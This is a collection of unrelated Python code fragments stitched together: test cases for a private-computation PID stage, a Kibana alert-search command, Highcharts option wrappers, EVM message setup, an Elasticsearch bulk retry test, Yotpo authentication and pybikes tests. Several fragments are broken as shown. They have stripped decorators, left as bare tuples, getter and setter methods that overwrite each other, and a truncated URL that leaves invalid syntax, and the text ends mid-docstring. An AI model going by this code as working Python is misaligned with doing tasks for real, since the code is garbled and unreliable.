        updated_pc_instance = await stage_svc.run_async(pc_instance=pc_instance, server_certificate_provider=NullCertificateProvider(), ca_certificate_provider=NullCertificateProvider(), server_certificate_path='', ca_certificate_path='')
        self.assertEqual(len(updated_pc_instance.infra_config.instances), self.test_num_containers, 'Failed to add the StageStageInstance into pc_instance')
        stage_state_actual = updated_pc_instance.infra_config.instances[0]
        self.assertEqual(stage_state_actual, stage_state_expect, 'Appended StageStageInstance is not as expected')

    async def test_pid_run_protocol_stage_with_tls(self) -> None:
        """With PCF_TLS enabled, containers get TLS cert/CA args, the TLS OPA
        workflow, and (for the partner) SERVER_HOSTNAME/IP_ADDRESS env vars."""
        async def _run_sub_test(pc_role: PrivateComputationRole, multikey_enabled: bool, run_id: Optional[str]=None) -> None:
            pid_protocol = (PIDProtocol.UNION_PID_MULTIKEY if ((self.test_num_containers == 1) and multikey_enabled) else PIDProtocol.UNION_PID)
            use_row_number = pid_should_use_row_numbers(self.use_row_numbers, pid_protocol)
            pc_instance = self.create_sample_pc_instance(pc_role, pid_use_row_numbers=use_row_number, pid_protocol=pid_protocol, multikey_enabled=multikey_enabled, run_id=run_id, use_tls=True)
            stage_svc = PIDRunProtocolStageService(storage_svc=self.mock_storage_svc, onedocker_svc=self.mock_onedocker_svc, onedocker_binary_config_map=self.onedocker_binary_config_map)
            containers = [self.create_container_instance(i) for i in range(self.test_num_containers)]
            self.mock_onedocker_svc.start_containers = MagicMock(return_value=containers)
            self.mock_onedocker_svc.wait_for_pending_containers = AsyncMock(return_value=containers)
            updated_pc_instance = await stage_svc.run_async(pc_instance=pc_instance, server_certificate_provider=NullCertificateProvider(), ca_certificate_provider=NullCertificateProvider(), server_certificate_path='tls/server_certificate.pem', ca_certificate_path='tls/ca_certificate.pem', server_ips=self.server_ips, server_hostnames=(['node0.meta.com'] if (pc_role is PrivateComputationRole.PARTNER) else None))
            binary_name = PIDRunProtocolBinaryService.get_binary_name(pid_protocol, pc_role)
            binary_config = self.onedocker_binary_config_map[binary_name]
            if pc_role is PrivateComputationRole.PUBLISHER:
                expected_env_vars = generate_env_vars_dict(repository_path=binary_config.repository_path, RUST_LOG='info')
            else:
                # Partner containers must know the publisher's hostname and IP.
                expected_env_vars = generate_env_vars_dict(repository_path=binary_config.repository_path, RUST_LOG='info', SERVER_HOSTNAME='node0.meta.com', IP_ADDRESS='192.0.2.0')
            args_str_expect = self.get_args_expect(pc_role, pid_protocol, self.use_row_numbers, run_id, use_tls=True)
            self.mock_onedocker_svc.start_containers.assert_called_with(package_name=binary_name, version=binary_config.binary_version, cmd_args_list=args_str_expect, timeout=DEFAULT_CONTAINER_TIMEOUT_IN_SEC, env_vars=[expected_env_vars], container_type=None, certificate_request=None, opa_workflow_path=TLS_OPA_WORKFLOW_PATH, permission=ContainerPermissionConfig(self.container_permission_id))
            self.assertEqual(len(updated_pc_instance.infra_config.instances), self.test_num_containers, 'Failed to add the StageStageInstance into pc_instance')
            stage_state_expect = StageStateInstance(pc_instance.infra_config.instance_id, pc_instance.current_stage.name, containers=containers)
            stage_state_actual = updated_pc_instance.infra_config.instances[0]
            self.assertEqual(stage_state_actual, stage_state_expect, 'Appended StageStageInstance is not as expected')
        data_tests = itertools.product([PrivateComputationRole.PUBLISHER, PrivateComputationRole.PARTNER], [True, False], [None, '2621fda2-0eca-11ed-861d-0242ac120002'])
        for (pc_role, multikey_enabled, test_run_id) in data_tests:
            with self.subTest(pc_role=pc_role, multikey_enabled=multikey_enabled, test_run_id=test_run_id):
                await _run_sub_test(pc_role=pc_role, multikey_enabled=multikey_enabled, run_id=test_run_id)

    def create_sample_pc_instance(self, pc_role: PrivateComputationRole=PrivateComputationRole.PARTNER, status: PrivateComputationInstanceStatus=PrivateComputationInstanceStatus.PID_PREPARE_COMPLETED, multikey_enabled: bool=False, pid_use_row_numbers: bool=True, pid_protocol: PIDProtocol=DEFAULT_PID_PROTOCOL, run_id: Optional[str]=None, server_domain: Optional[str]=None, use_tls: Optional[bool]=False) -> PrivateComputationInstance:
        """Build a PrivateComputationInstance configured for these tests."""
        # NOTE(review): the original had a syntax error here (`status_update_ts=,`);
        # reconstructed as the current timestamp, matching sibling fixtures — confirm.
        infra_config: InfraConfig = InfraConfig(instance_id=self.pc_instance_id, role=pc_role, status=status, status_update_ts=int(time.time()), instances=[], game_type=PrivateComputationGameType.LIFT, num_pid_containers=self.test_num_containers, num_mpc_containers=self.test_num_containers, num_files_per_mpc_container=self.test_num_containers, status_updates=[], run_id=run_id, server_domain=server_domain, pcs_features=(set() if (not use_tls) else {PCSFeature.PCF_TLS}), container_permission_id=self.container_permission_id)
        common: CommonProductConfig = CommonProductConfig(input_path=self.input_path, output_dir=self.output_path, pid_use_row_numbers=pid_use_row_numbers, multikey_enabled=multikey_enabled, pid_protocol=pid_protocol)
        product_config: ProductConfig = LiftConfig(common=common)
        return PrivateComputationInstance(infra_config=infra_config, product_config=product_config)

    def create_container_instance(self, id: int, container_status: ContainerInstanceStatus=ContainerInstanceStatus.COMPLETED) -> ContainerInstance:
        """Build a dummy container instance with a per-index id and IP."""
        return ContainerInstance(instance_id=f'test_container_instance_{id}', ip_address=f'127.0.0.{id}', status=container_status)

    def get_args_expect(self, pc_role: PrivateComputationRole, protocol: PIDProtocol, use_row_numbers: bool, test_run_id: Optional[str]=None, use_tls: Optional[bool]=False) -> List[str]:
        """Return the command-line args expected for the given role/protocol/TLS combo."""
        arg_ls = []
        if ((pc_role is PrivateComputationRole.PUBLISHER) and (protocol is PIDProtocol.UNION_PID) and (not use_tls)):
            arg_ls.append('--host 0.0.0.0:15200 --input out/test_instance_123_out_dir/pid_stage/out.csv_publisher_prepared_0 --output out/test_instance_123_out_dir/pid_stage/out.csv_publisher_pid_matched_0 --metric-path out/test_instance_123_out_dir/pid_stage/out.csv_publisher_pid_matched_0_metrics --no-tls --use-row-numbers')
        elif ((pc_role is PrivateComputationRole.PUBLISHER) and (protocol is PIDProtocol.UNION_PID) and use_tls):
            arg_ls.append('--host 0.0.0.0:15200 --input out/test_instance_123_out_dir/pid_stage/out.csv_publisher_prepared_0 --output out/test_instance_123_out_dir/pid_stage/out.csv_publisher_pid_matched_0 --metric-path out/test_instance_123_out_dir/pid_stage/out.csv_publisher_pid_matched_0_metrics --use-row-numbers --tls-cert tls/server_certificate.pem --tls-key tls/private_key.pem')
        elif ((pc_role is PrivateComputationRole.PUBLISHER) and (protocol is PIDProtocol.UNION_PID_MULTIKEY) and (not use_tls)):
            arg_ls.append('--host 0.0.0.0:15200 --input out/test_instance_123_out_dir/pid_stage/out.csv_publisher_prepared_0 --output out/test_instance_123_out_dir/pid_stage/out.csv_publisher_pid_matched_0 --metric-path out/test_instance_123_out_dir/pid_stage/out.csv_publisher_pid_matched_0_metrics --no-tls')
        elif ((pc_role is PrivateComputationRole.PUBLISHER) and (protocol is PIDProtocol.UNION_PID_MULTIKEY) and use_tls):
            arg_ls.append('--host 0.0.0.0:15200 --input out/test_instance_123_out_dir/pid_stage/out.csv_publisher_prepared_0 --output out/test_instance_123_out_dir/pid_stage/out.csv_publisher_pid_matched_0 --metric-path out/test_instance_123_out_dir/pid_stage/out.csv_publisher_pid_matched_0_metrics --tls-cert tls/server_certificate.pem --tls-key tls/private_key.pem')
        elif ((pc_role is PrivateComputationRole.PARTNER) and (protocol is PIDProtocol.UNION_PID) and (not use_tls)):
            arg_ls.append('--company --input out/test_instance_123_out_dir/pid_stage/out.csv_advertiser_prepared_0 --output out/test_instance_123_out_dir/pid_stage/out.csv_advertiser_pid_matched_0 --no-tls --use-row-numbers')
        elif ((pc_role is PrivateComputationRole.PARTNER) and (protocol is PIDProtocol.UNION_PID) and use_tls):
            arg_ls.append('--company --input out/test_instance_123_out_dir/pid_stage/out.csv_advertiser_prepared_0 --output out/test_instance_123_out_dir/pid_stage/out.csv_advertiser_pid_matched_0 --use-row-numbers --tls-ca tls/ca_certificate.pem')
        elif ((pc_role is PrivateComputationRole.PARTNER) and (protocol is PIDProtocol.UNION_PID_MULTIKEY) and (not use_tls)):
            arg_ls.append('--company --input out/test_instance_123_out_dir/pid_stage/out.csv_advertiser_prepared_0 --output out/test_instance_123_out_dir/pid_stage/out.csv_advertiser_pid_matched_0 --no-tls')
        elif ((pc_role is PrivateComputationRole.PARTNER) and (protocol is PIDProtocol.UNION_PID_MULTIKEY) and use_tls):
            arg_ls.append('--company --input out/test_instance_123_out_dir/pid_stage/out.csv_advertiser_prepared_0 --output out/test_instance_123_out_dir/pid_stage/out.csv_advertiser_pid_matched_0 --tls-ca tls/ca_certificate.pem')
        # Append the run-id flag when present; the original's trailing unreachable
        # `return arg_ls` after this return has been removed.
        if test_run_id is not None:
            return [f'{arg} --run_id {test_run_id}' for arg in arg_ls]
        return arg_ls
# NOTE(review): the decorator lines below were corrupted in the original (leading
# '@' / '@click.<kind>' fragments stripped, leaving invalid syntax such as
# `('query', required=False)`); they are reconstructed here — confirm the argument
# and option declarations against the CLI's other commands.
@_group.command('search-alerts')
@click.argument('query', required=False)
@click.option('--date-range', '-d', type=(str, str), default=('now-7d', 'now'), help='Date range to scope search')
@click.option('--columns', '-c', multiple=True, help='Columns to display in table')
@click.option('--extend', '-e', is_flag=True, help='If columns are specified, extend the original columns')
@click.option('--max-count', '-m', default=100, help='The max number of alerts to return')
@click.pass_context
def search_alerts(ctx, query, date_range, columns, extend, max_count):
    """Search detection-engine alerts in Kibana and print them as a table."""
    from eql.table import Table
    from .eswrap import MATCH_ALL, add_range_to_dsl
    kibana = ctx.obj['kibana']
    (start_time, end_time) = date_range
    # No query means match everything within the date range.
    kql_query = (kql.to_dsl(query) if query else MATCH_ALL)
    add_range_to_dsl(kql_query['bool'].setdefault('filter', []), start_time, end_time)
    with kibana:
        alerts = [a['_source'] for a in Signal.search({'query': kql_query}, size=max_count)['hits']['hits']]
    if alerts:
        table_columns = ['host.hostname']
        # Pick the column set matching the alert document schema (legacy
        # `signal.*`, newer `kibana.alert.*`, or plain rule fields).
        if ('signal' in alerts[0]):
            table_columns += ['signal.rule.name', 'signal.status', 'signal.original_time']
        elif ('kibana.alert.rule.name' in alerts[0]):
            table_columns += ['kibana.alert.rule.name', 'kibana.alert.status', 'kibana.alert.original_time']
        else:
            table_columns += ['rule.name', '']
        if columns:
            columns = list(columns)
            table_columns = ((table_columns + columns) if extend else columns)
        # Flatten dotted keys so the table renderer can address them.
        for alert in alerts:
            for key in table_columns:
                if (key in alert):
                    nested_set(alert, key, alert[key])
        click.echo(Table.from_list(table_columns, alerts))
    else:
        click.echo('No alerts detected')
    return alerts
class ClassDocumenter(autodoc.ClassDocumenter):
    """Sphinx autodoc ClassDocumenter tweaked for dsl.Schema metaclasses and
    for hiding provider.Meta.__call__."""

    def import_object(self, raiseerror: bool=False) -> bool:
        # When the target is a dsl.Schema instance, document its metaclass
        # instead and force full class-style documentation.
        imported = super().import_object(raiseerror)
        if isinstance(self.object, dsl.Schema.__class__):
            self.object = self.object.__class__
            self.doc_as_attr = False
        return imported

    def get_attr(self, obj: typing.Any, name: str, *defargs: typing.Any) -> typing.Any:
        # Suppress provider.Meta.__call__ so it never appears in the docs.
        if (obj is provider.Meta) and (name == '__call__'):
            return None
        return super().get_attr(obj, name, *defargs)
def get_required_data_to_create_purchase_record(order, center, error_logs):
    """Collect the data needed to create a purchase record for a Zenoti order.

    Validation problems are appended to `error_logs` as human-readable messages
    rather than raised. Returns a list holding at most one record dict; empty
    when the order was already synced or its items failed validation.
    """
    records = []
    already_synced = (frappe.db.exists('Purchase Invoice', {'zenoti_order_no': order['order_number']}) or frappe.db.exists('Purchase Order', {'zenoti_order_no': order['order_number']}))
    if already_synced:
        return records
    cost_center = center.get('erpnext_cost_center')
    if not cost_center:
        # Missing mapping is reported but processing continues, matching the
        # original flow.
        err_msg = _('Center {0} is not linked to any ERPNext Cost Center.').format(frappe.bold(center.get('center_name')))
        error_logs.append((_('For Order no {}.').format(order['order_number']) + ' ') + err_msg)
    (item_data, item_err_msg_list) = process_purchase_partials(order.get('partials'), cost_center)
    if item_err_msg_list:
        combined = '\n'.join(item_err_msg_list)
        error_logs.append((_('For Order no {}.').format(order['order_number']) + '\n') + combined)
    else:
        date_time = order['ordered_date'].split('T')
        records.append({'supplier': order['vendor']['code'], 'date': date_time[0], 'time': date_time[1], 'order_number': order['order_number'], 'status': order['status'], 'item_data': item_data, 'is_return': item_data[0]['is_return'], 'cost_center': cost_center})
    return records
class OptionPlotoptionsColumnpyramidSonificationDefaultinstrumentoptionsMappingTremoloSpeed(Options):
    """Highcharts sonification tremolo-speed mapping options for columnpyramid
    series.

    NOTE(review): each paired no-arg / one-arg def below looks like a
    @property getter/setter pair whose decorators were stripped; as written
    the setter def shadows the getter.
    """

    def mapFunction(self):
        # Getter: custom mapping function (None when unset).
        return self._config_get(None)

    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    def mapTo(self):
        # Getter: data property the tremolo speed is mapped to.
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        # Getter: upper bound of the mapped range.
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        # Getter: lower bound of the mapped range.
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        # Getter: what the mapping range is computed within.
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
def find_closest_segment(segs, target_length):
    """Return the segment whose length is closest to `target_length`.

    Ties keep the earliest segment; an empty `segs` yields None.
    """
    return min(segs, key=lambda seg: abs(len(seg) - target_length), default=None)
class RichTextFormField(forms.fields.CharField):
    """CharField whose widget is tagged with the 'item-richtext' CSS class and
    whose cleaned value can be post-processed by an optional `cleanse` callable."""

    def __init__(self, *args, **kwargs):
        # `cleanse` is our own kwarg; strip it before the parent sees kwargs.
        self.cleanse = kwargs.pop('cleanse', None)
        super().__init__(*args, **kwargs)
        # Append our marker class to whatever classes the widget already has.
        existing_classes = self.widget.attrs.get('class', '')
        self.widget.attrs['class'] = existing_classes + ' item-richtext'

    def clean(self, value):
        cleaned = super().clean(value)
        return self.cleanse(cleaned) if self.cleanse else cleaned
class MissingTranslationHandler(ResponseHandler):
    """ResponseHandler for the translations/missing.json endpoint."""

    # NOTE(review): the first parameter is `api`, not `self`, so this was
    # evidently a @staticmethod whose decorator was stripped; restored here —
    # confirm against how other ResponseHandler subclasses declare applies_to.
    @staticmethod
    def applies_to(api, response):
        return ('translations/missing.json' in get_endpoint_path(api, response))

    def build(self, response):
        # Parse the JSON payload and extract the interesting part.
        return self.deserialize(response.json())

    def deserialize(self, response_json):
        """Return just the list of locales from the endpoint payload."""
        return response_json['locales']
class SkipBuildCache():
    """Context manager that temporarily overrides the module-level
    `skip_cache_flag`, restoring the previous value on exit (nest-safe)."""

    def __init__(self, context_skip_cache_flag: bool=True):
        self.context_skip_cache_flag = context_skip_cache_flag

    def __enter__(self):
        global skip_cache_flag
        self.old_skip_cache_flag = skip_cache_flag
        skip_cache_flag = self.context_skip_cache_flag
        # Fixed: return self so `with SkipBuildCache() as ctx:` binds the
        # manager instead of None (previously __enter__ returned None).
        return self

    def __exit__(self, *args, **kwargs):
        # Restore whatever value was active on entry.
        global skip_cache_flag
        skip_cache_flag = self.old_skip_cache_flag
def test_nan_encoding_for_new_categories_if_unseen_is_ignore():
    """Categories unseen at fit time must transform to NaN when unseen='ignore'."""
    # 'd' (col1) and '4' (col2) never appear in the fit frame.
    df_fit = pd.DataFrame({'col1': ['a', 'a', 'b', 'a', 'c'], 'col2': ['1', '2', '3', '1', '2']})
    df_transf = pd.DataFrame({'col1': ['a', 'd', 'b', 'a', 'c'], 'col2': ['1', '2', '3', '1', '4']})
    encoder = CountFrequencyEncoder(unseen='ignore').fit(df_fit)
    result = encoder.transform(df_transf)
    # Exactly one unseen category per column -> two NaNs overall.
    assert (pd.isnull(result).sum().sum() == 2)
    # Seen categories map to their fit-time counts; unseen ones to NaN.
    expected_result = pd.DataFrame({'col1': [3, nan, 1, 3, 1], 'col2': [2, 2, 1, 2, nan]})
    pd.testing.assert_frame_equal(result, expected_result)
def set_nested_key(dict_: dict, keys: list, key: Any, value: Any):
    """Set ``value`` under ``key`` in the nested dict reached via ``keys``.

    Walks ``dict_`` along ``keys``, creating empty dicts for missing levels,
    then assigns ``value`` at the final level under ``key``. Mutates
    ``dict_`` in place; returns None.

    Raises:
        ValueError: if an intermediate key already exists but is not a dict.
    """
    node = dict_
    for k in keys:
        if k not in node:
            node[k] = {}
        if not isinstance(node[k], dict):
            # Cannot descend through a non-dict value; report which key.
            raise ValueError(f'cannot set nested key: value at {k!r} is not a dict')
        node = node[k]
    node[key] = value
class OptionPlotoptionsSankeySonification(Options):
    """Auto-generated Highcharts wrapper: sonification options for sankey series.

    NOTE(review): ``enabled`` appears twice (getter then setter); the
    @property / @enabled.setter decorators were presumably stripped during
    extraction — confirm against the generator output.
    """

    def contextTracks(self) -> 'OptionPlotoptionsSankeySonificationContexttracks':
        # Lazily materialized sub-option object.
        return self._config_sub_data('contextTracks', OptionPlotoptionsSankeySonificationContexttracks)

    def defaultInstrumentOptions(self) -> 'OptionPlotoptionsSankeySonificationDefaultinstrumentoptions':
        return self._config_sub_data('defaultInstrumentOptions', OptionPlotoptionsSankeySonificationDefaultinstrumentoptions)

    def defaultSpeechOptions(self) -> 'OptionPlotoptionsSankeySonificationDefaultspeechoptions':
        return self._config_sub_data('defaultSpeechOptions', OptionPlotoptionsSankeySonificationDefaultspeechoptions)

    def enabled(self):
        # Sonification is enabled by default for this series type.
        return self._config_get(True)

    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    def pointGrouping(self) -> 'OptionPlotoptionsSankeySonificationPointgrouping':
        return self._config_sub_data('pointGrouping', OptionPlotoptionsSankeySonificationPointgrouping)

    def tracks(self) -> 'OptionPlotoptionsSankeySonificationTracks':
        return self._config_sub_data('tracks', OptionPlotoptionsSankeySonificationTracks)
def prepare_message(caller: Address, target: Union[(Bytes0, Address)], value: U256, data: Bytes, gas: Uint, env: Environment, code_address: Optional[Address]=None, should_transfer_value: bool=True, is_static: bool=False) -> Message:
    """Build the top-level EVM ``Message`` for a transaction.

    A ``Bytes0`` target means contract creation: the new contract address is
    derived from the caller and its nonce, ``data`` becomes the init code,
    and the message carries no calldata. An ``Address`` target means a call:
    ``data`` is the calldata and the code is loaded from the target account
    (``code_address`` defaults to the target).

    Raises:
        AssertionError: if ``target`` is neither ``Bytes0`` nor ``Address``.
    """
    if isinstance(target, Bytes0):
        # nonce - 1: the caller's nonce was already incremented for this
        # transaction before the message is prepared.
        current_target = compute_contract_address(caller, (get_account(env.state, caller).nonce - U256(1)))
        msg_data = Bytes(b'')
        code = data
    elif isinstance(target, Address):
        current_target = target
        msg_data = data
        code = get_account(env.state, target).code
        if (code_address is None):
            code_address = target
    else:
        raise AssertionError('Target must be address or empty bytes')
    return Message(caller=caller, target=target, gas=gas, value=value, data=msg_data, code=code, depth=Uint(0), current_target=current_target, code_address=code_address, should_transfer_value=should_transfer_value, is_static=is_static, parent_evm=None)
def apk_parse_release_filename(apkname):
    """Split an APK release filename into (appid, versionCode, signer fingerprint).

    The signed-filename pattern is tried first, then the plain one; when
    neither matches, ``(None, None, None)`` is returned.
    """
    for pattern, has_sigfp in ((apk_release_filename_with_sigfp, True), (apk_release_filename, False)):
        match = pattern.match(apkname)
        if match:
            sigfp = match.group('sigfp') if has_sigfp else None
            return (match.group('appid'), int(match.group('vercode')), sigfp)
    return (None, None, None)
def _generate_apidocs_default_packages() -> None:
    """Generate markdown API docs for every module of the default packages."""
    for (component_type, default_package) in DEFAULT_PACKAGES:
        public_id = PublicId.from_str(default_package)
        author = public_id.author
        name = public_id.name
        type_plural = component_type.to_plural()
        # Packages live under PACKAGES_DIR/<author>/<type_plural>/<name>.
        package_dir = (((PACKAGES_DIR / author) / type_plural) / name)
        for module_path in package_dir.rglob('*.py'):
            # NOTE(review): this progress line prints even for modules that
            # the next check skips — possibly intentional; confirm.
            print(f'Processing {module_path}...', end='')
            if should_skip(module_path):
                continue
            # Mirror the package-relative path, swapping '.py' for '.md'.
            suffix = Path((str(module_path.relative_to(package_dir))[:(- 3)] + '.md'))
            # Dotted module path with the trailing '.py' removed.
            dotted_path = '.'.join(module_path.parts)[:(- 3)]
            doc_file = (((API_DIR / type_plural) / name) / suffix)
            make_pydoc(dotted_path, doc_file)
def _parse_sitemap(root):
    """Flatten a parsed sitemap XML tree into a pandas DataFrame.

    One row per URL entry (keyed by its <loc> text); columns are the entry's
    child tags, with nested tags prefixed by their parent tag name
    (e.g. ``image_loc``).
    """
    d = dict()
    # First pass: register every URL (the <loc> text) as a row key.
    for node in root:
        for n in node:
            if ('loc' in n.tag):
                d[n.text] = {}

    def parse_xml_node(node, node_url, prefix=''):
        # Recursively collect tag -> text pairs into d[node_url].
        nonlocal d
        keys = []
        for element in node:
            if element.text:
                # Strip the XML namespace ('{ns}tag' -> 'tag').
                tag = element.tag.split('}')[(- 1)]
                d[node_url][(prefix + tag)] = element.text
                keys.append(tag)
                # NOTE(review): this reset only fires when `tag` is missing
                # from `keys`, which cannot happen since `tag` was just
                # appended — presumably intended for repeated tags; confirm.
                prefix = (prefix if (tag in keys) else '')
            if list(element):
                # Recurse into children, prefixing with the parent tag.
                parse_xml_node(element, node_url, prefix=(element.tag.split('}')[(- 1)] + '_'))
    # Second pass: fill each row from its entry node.
    for node in root:
        node_url = [n.text for n in node if ('loc' in n.tag)][0]
        parse_xml_node(node, node_url=node_url)
    return pd.DataFrame(d.values())
class OptionSonificationDefaultinstrumentoptionsMappingTremoloSpeed(Options):
    """Auto-generated Highcharts wrapper: tremolo-speed mapping options for the
    chart-wide default sonification instrument.

    NOTE(review): each option below appears as a getter/setter pair sharing one
    name; the @property / @<name>.setter decorators were presumably stripped
    during extraction — confirm against the code generator's output.
    """

    def mapFunction(self):
        # Mapping function for the tremolo speed; no default configured.
        return self._config_get(None)

    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    def mapTo(self):
        # Point property to map this parameter to.
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        # Upper bound of the mapped range.
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        # Lower bound of the mapped range.
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def value(self):
        # Fixed value used instead of a mapping, when set.
        return self._config_get(None)

    def value(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        # What data scope the mapping is computed within.
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
class OptionSeriesBarSonificationContexttracksMappingTime(Options):
    """Auto-generated Highcharts wrapper: time mapping options for the
    sonification context tracks of bar series.

    NOTE(review): each option below appears as a getter/setter pair sharing one
    name; the @property / @<name>.setter decorators were presumably stripped
    during extraction — confirm against the code generator's output.
    """

    def mapFunction(self):
        # Mapping function for the time parameter; no default configured.
        return self._config_get(None)

    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    def mapTo(self):
        # Point property to map this parameter to.
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        # Upper bound of the mapped range.
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        # Lower bound of the mapped range.
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        # What data scope the mapping is computed within.
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
# NOTE(review): this bare `(eq=False)` looks like the remnant of a stripped
# `@dataclass(eq=False)` decorator (it is not valid Python as written) —
# restore the decorator when merging.
(eq=False)
class Argument(Expression):
    """A formal argument of an expression."""
    info: str = ''                     # free-form description text
    type_string: Optional[str] = None  # declared type, if any
    name: Optional[str] = None         # argument name, if any

    # NOTE(review): `id` is read as `self.id` in __str__ below, which only
    # yields a useful value if this was decorated with @property (presumably
    # stripped during extraction) — confirm.
    def id(self):
        return id_str(self, 3)

    def __str__(self):
        # Fall back to a generated placeholder when the argument is unnamed.
        arg = (self.name if self.name else f'arg_{self.id}')
        return f'{{{arg}}}'
    __repr__ = __str__
def _split_periods(curr_data: pd.DataFrame, ref_data: pd.DataFrame, feature_name: str):
    """Resolve the boundary period shared by the reference and current frames.

    The last period of ``ref_data`` and the first period of ``curr_data`` may
    be the same (split) time bucket: the smaller half's ``number_of_items``
    count is folded into the larger half, and the smaller half's row is
    dropped from its frame.

    Returns:
        The adjusted ``(curr_data, ref_data)`` pair.
    """
    max_ref_date = ref_data[feature_name].max()
    min_curr_date = curr_data[feature_name].min()
    # NOTE(review): the Series additions below align on index labels — this
    # assumes the matching rows of both frames share index labels; confirm
    # with the callers (otherwise the sum would produce NaN).
    if (curr_data.loc[((curr_data[feature_name] == min_curr_date), 'number_of_items')].iloc[0] > ref_data.loc[((ref_data[feature_name] == max_ref_date), 'number_of_items')].iloc[0]):
        # Current half is larger: absorb the reference half and drop its row.
        curr_data.loc[((curr_data[feature_name] == min_curr_date), 'number_of_items')] = (curr_data.loc[((curr_data[feature_name] == min_curr_date), 'number_of_items')] + ref_data.loc[((ref_data[feature_name] == max_ref_date), 'number_of_items')])
        ref_data = ref_data[(ref_data[feature_name] != max_ref_date)]
    else:
        # Reference half is larger (or equal): absorb the current half.
        ref_data.loc[((ref_data[feature_name] == max_ref_date), 'number_of_items')] = (ref_data.loc[((ref_data[feature_name] == max_ref_date), 'number_of_items')] + curr_data.loc[((curr_data[feature_name] == min_curr_date), 'number_of_items')])
        curr_data = curr_data[(curr_data[feature_name] != min_curr_date)]
    return (curr_data, ref_data)
def test_bulk_rejected_documents_are_retried(sync_client):
    """streaming_bulk must retry 429-rejected chunks and eventually index all docs."""
    # Wrap the client so one bulk call fails with a 429 rejection.
    failing_client = FailingBulkClient(sync_client, fail_with=ApiError(message='Rejected!', body={}, meta=ApiResponseMeta(status=429, headers={}, duration=0, node=None)))
    docs = [{'_index': 'i', '_id': 47, 'f': 'v'}, {'_index': 'i', '_id': 45, 'f': 'v'}, {'_index': 'i', '_id': 42, 'f': 'v'}]
    # chunk_size=1 makes each doc its own bulk request; a single retry is
    # allowed with no backoff delay.
    results = list(helpers.streaming_bulk(failing_client, docs, index='i', raise_on_exception=False, raise_on_error=False, chunk_size=1, max_retries=1, initial_backoff=0))
    assert (3 == len(results))
    print(results)
    # Every doc must ultimately report success.
    assert ([True, True, True] == [r[0] for r in results])
    sync_client.indices.refresh(index='i')
    res = sync_client.search(index='i')
    assert ({'value': 3, 'relation': 'eq'} == res['hits']['total'])
    # 3 successful bulk calls plus the one rejected call that was retried.
    assert (4 == failing_client._called)
class YotpoReviewsAuthenticationStrategy(AuthenticationStrategy):
    """Authenticates requests to the Yotpo reviews API by exchanging the
    configured secret key for an access token."""
    name = 'yotpo_reviews'
    configuration_model = YotpoReviewsAuthenticationConfiguration

    def __init__(self, configuration: YotpoReviewsAuthenticationConfiguration):
        # Both values may be placeholder templates resolved against secrets.
        self.store_id = configuration.store_id
        self.secret_key = configuration.secret_key

    def add_authentication(self, request: PreparedRequest, connection_config: ConnectionConfig) -> PreparedRequest:
        """Fetch an access token and attach it to both Yotpo auth headers.

        Raises:
            FidesopsException: when the token endpoint does not respond OK.
        """
        secrets = cast(Dict, connection_config.secrets)
        # NOTE(review): the token-endpoint URL inside this f-string was
        # truncated during extraction (the line is not valid Python as
        # written) — restore the original Yotpo URL, which presumably
        # interpolated the store id via assign_placeholders(..., secrets).
        response = post(url=f' secrets)}/access_tokens', json={'secret': assign_placeholders(self.secret_key, secrets)})
        if response.ok:
            json_response = response.json()
            access_token = json_response.get('access_token')
        else:
            raise FidesopsException(f'Unable to get access token {response.json()}')
        request.headers['X-Yotpo-Token'] = access_token
        request.headers['x-utoken'] = access_token
        return request
# NOTE(review): these bare tuples look like the remnants of stripped
# mock/patch decorators (e.g. @mock.patch.object / @mock.patch with the same
# (target, replacement) pairs); as written they are no-op expression
# statements — restore the decorators when merging.
('pybikes.data._import', _import)
('pybikes.data._iter_data', _iter_data)
('pybikes.data._t_cache', {})
('pybikes.data._traversor', _traverse_lib())

class TestData():
    """Tests for pybikes' system discovery helpers (find / get)."""

    def test_find_not_found(self):
        """Unknown tags raise instead of returning None."""
        with pytest.raises(BikeShareSystemNotFound):
            find('abracadabra')

    def test_find_single_class(self):
        """find() resolves a tag declared by a single-class module."""
        (mod, cls, i_data) = find('foobar-rocks')
        assert (mod == 'foobar')
        assert (cls == 'Foobar')
        assert (i_data == foobar_data['instances'][0])

    def test_find_multi_class(self):
        """find() resolves a tag declared inside a multi-class module."""
        (mod, cls, i_data) = find('bazbar-sucks')
        assert (mod == 'barbaz')
        assert (cls == 'BazBar')
        assert (i_data == barbaz_data['class']['BazBar']['instances'][1])

    def test_get_not_found(self):
        with pytest.raises(BikeShareSystemNotFound):
            get('abracadabra')

    def test_get_instances(self):
        """get() instantiates the correct class for every known tag."""
        assert isinstance(get('foobar-rocks'), foobar.Foobar)
        assert isinstance(get('foobar-sucks'), foobar.Foobar)
        assert isinstance(get('barbaz-rocks'), barbaz.BarBaz)
        assert isinstance(get('barbaz-sucks'), barbaz.BarBaz)
        assert isinstance(get('bazbar-rocks'), barbaz.BazBar)
        assert isinstance(get('bazbar-sucks'), barbaz.BazBar)

    def test_get_instance_needs_key(self):
        """Systems that require an API key receive the key passed to get()."""
        foo = get('bazbar-summer', key='foobar')
        assert (getattr(foo, 'key') == 'foobar')

    def test_get_instance_needs_key_error(self):
        """Omitting a required API key raises."""
        with pytest.raises(Exception):
            get('bazbar-summer')
class ArchivedResults(enum.Enum):
    """How archived entries are handled when querying results.

    Each member pairs a numeric id with the value sent to the API
    (``None`` meaning "no filter").
